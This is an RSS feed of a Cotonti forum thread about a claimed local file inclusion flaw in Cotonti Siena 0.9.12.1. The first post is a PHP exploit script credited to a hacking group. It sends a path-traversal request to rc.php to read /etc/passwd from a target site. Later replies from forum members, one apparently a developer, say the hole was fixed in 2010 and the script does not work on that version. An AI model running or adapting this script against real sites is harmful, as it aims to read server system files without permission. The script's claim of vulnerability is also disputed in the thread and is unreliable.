<?xml version='1.0' encoding='UTF-8'?>
<rss version='2.0'>
	<channel>
		<title>cotonti.com : Siena LFI hacking</title>
		<link>https://www.cotonti.com</link>
		<description>Neueste Themenbeiträge</description>
		<generator>Cotonti</generator>
		<language>en</language>
		<pubDate>Fri, 01 May 2026 00:56:20 -0000</pubDate>

		<item>
			<title>Trustmaster</title>
			<description><![CDATA[<p>
	Seriously, this was fixed in 2010. It is incorrect to say that 0.9.12.1 is vulnerable.</p>
]]></description>
			<pubDate>Mo, 18 Feb 2013 18:24:37 -0000</pubDate>
			<link><![CDATA[https://www.cotonti.com/de/forums?m=posts&q=7345&d=0#post37048]]></link>
		</item>
		<item>
			<title>tensh</title>
			<description><![CDATA[<p>
	does it work on previous Sienas? How to prevent it? Can I just delete this file?</p>
]]></description>
			<pubDate>Mo, 18 Feb 2013 08:43:11 -0000</pubDate>
			<link><![CDATA[https://www.cotonti.com/de/forums?m=posts&q=7345&d=0#post37047]]></link>
		</item>
		<item>
			<title>Xerora</title>
			<description><![CDATA[<p>
	This won't work on 0.9.12.1. It seems like this has been the case for many versions before 0.9.12.1 as well as far as I can tell.</p>
<p>
	<em>edit: removed line that could be misread about the error that it would return</em></p>
]]></description>
			<pubDate>So, 17 Feb 2013 06:18:08 -0000</pubDate>
			<link><![CDATA[https://www.cotonti.com/de/forums?m=posts&q=7345&d=0#post37042]]></link>
		</item>
		<item>
			<title>MecTruy</title>
			<description><![CDATA[<pre class="brush:php;">
LFI attack Cotonti Siena 0.9.12.1 LFI


&lt;?php
/* 
*  WWW.PUNISH3R.COM
*  Bug               :Cotonti Siena 0.9.12.1 LFI
*  Author(Pentester) : FreWaL &amp; Dr.Ly0n
*  Special Thanks    : Z0rLu, MaXtoR, MecTruy, Polonia, Monarchy, Eno7, RedWorm, R00tk!d, Harded, The_Mirkin and PUNISH3R all special user
*
*/
$hedef  = "http://hedefsite.com";
$dosya  = ".%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2Fetc%2Fpassword";
$curl = curl_init();
curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl, CURLOPT_URL, "http://$hedef/rc.php?rc=".$dosya);
curl_setopt($curl, CURLOPT_HTTPGET, 1);
curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($curl, CURLOPT_TIMEOUT, 3);
curl_setopt($curl, CURLOPT_LOW_SPEED_LIMIT, 3);
curl_setopt($curl, CURLOPT_LOW_SPEED_TIME, 3);
curl_setopt($curl, CURLOPT_COOKIEJAR, "/tmp/cookie_$hedef");
$cikti = curl_exec ($curl);
curl_close($curl);
unset($curl);

echo $cikti;
?&gt;</pre>
<p>
	 </p>
]]></description>
			<pubDate>So, 17 Feb 2013 00:39:47 -0000</pubDate>
			<link><![CDATA[https://www.cotonti.com/de/forums?m=posts&q=7345&d=0#post37040]]></link>
		</item>
	</channel>
</rss>